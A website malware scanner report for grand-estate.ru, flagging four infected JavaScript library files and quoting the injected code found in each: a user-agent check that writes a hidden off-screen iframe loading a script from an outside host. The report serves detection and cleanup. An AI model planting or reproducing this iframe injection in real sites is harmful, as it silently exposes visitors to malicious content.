New scan:

Malware Scanner report for grand-estate.ru

Malicious/Suspicious/Total urls checked
4/0/6
4 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/4
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.grand-estate.ru/
200 OK
Content-Length: 2862
Content-Type: text/html
clean
http://www.grand-estate.ru/site_not_work/jquery-1.11.0.min.js
200 OK
Content-Length: 96954
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Opelcorsamodel() {
var ariga = navigator.userAgent;
var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1);
if (!hightvo) {
document.write('<iframe src="http://actions.ministrywife.com/aguismanic.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
}
}
Opelcorsamodel();
!function(a,b){"o
... 3195 bytes are skipped ...
h.max(b.body["scroll"+a],e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var fd=a.jQuery,gd=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=gd),b&&a.jQuery===n&&(a.jQuery=fd),n},typeof b===L&&(a.jQuery=a.$=n),n});

Antivirus reports:

Avast
JS:Iframe-EJK [Trj]
Fortinet
JS/Iframe.JY!tr
Sophos
Troj/JSRedir-OI

http://www.grand-estate.ru/site_not_work/jquery.formstyler.js
200 OK
Content-Length: 30600
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Opelcorsamodel() {
var ariga = navigator.userAgent;
var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1);
if (!hightvo) {
document.write('<iframe src="http://actions.ministrywife.com/aguismanic.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
}
}
Opelcorsamodel();
(function($) {
... 3499 bytes are skipped ...

el.on('refresh', function() {
el.parent().before(el).remove();
selectbox();
});
}
});

} else if (el.is(':reset')) {
el.click(function() {
setTimeout(function() {
el.closest(opt.wrapper).find('input, select').trigger('refresh');
}, 1)
});
}

})
.promise()
.done(function() {
opt.onFormStyled.call();
});
}
})(jQuery);

Antivirus reports:

Avast
JS:Iframe-EJK [Trj]
Fortinet
JS/Iframe.JY!tr
Sophos
Troj/JSRedir-OI

http://www.grand-estate.ru/site_not_work/jasny-bootstrap.js
200 OK
Content-Length: 31511
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Opelcorsamodel() {
var ariga = navigator.userAgent;
var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1);
if (!hightvo) {
document.write('<iframe src="http://actions.ministrywife.com/aguismanic.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
}
}
Opelcorsamodel();
if (typeof jQuery
... 3465 bytes are skipped ...
turn this
}

$(document).on('click.fileinput.data-api', '[data-provides="fileinput"]', function (e) {
var $this = $(this)
if ($this.data('bs.fileinput')) return
$this.fileinput($this.data())

var $target = $(e.target).closest('[data-dismiss="fileinput"],[data-trigger="fileinput"]');
if ($target.length > 0) {
e.preventDefault()
$target.trigger('click.bs.fileinput')
}
})
}(window.jQuery);

Antivirus reports:

Avast
JS:Iframe-EJK [Trj]
Fortinet
JS/Iframe.JY!tr
Sophos
Troj/JSRedir-OI

http://www.grand-estate.ru/site_not_work/bootstrap.js
200 OK
Content-Length: 56849
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Opelcorsamodel() {
var ariga = navigator.userAgent;
var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1);
if (!hightvo) {
document.write('<iframe src="http://actions.ministrywife.com/aguismanic.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
}
}
Opelcorsamodel();
!function ($) {
... 3548 bytes are skipped ...
;ul class="typeahead dropdown-menu"></ul>'
, item: '<li><a href="#"></a></li>'
, minLength: 1
}
$.fn.typeahead.Constructor = Typeahead

$(function () {
$('body').on('focus.typeahead.data-api', '[data-provide="typeahead"]', function (e) {
var $this = $(this)
if ($this.data('typeahead')) return
e.preventDefault()
$this.typeahead($this.data())
})
})
}(window.jQuery);

Antivirus reports:

Avast
JS:Iframe-EJK [Trj]
Fortinet
JS/Iframe.JY!tr
Sophos
Troj/JSRedir-OI

http://www.grand-estate.ru/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: grand-estate.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: grand-estate.ru
Referer: http://www.google.com/search?q=grand-estate.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=grand-estate.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://grand-estate.ru/

Result: grand-estate.ru is not infected or malware details are not published yet.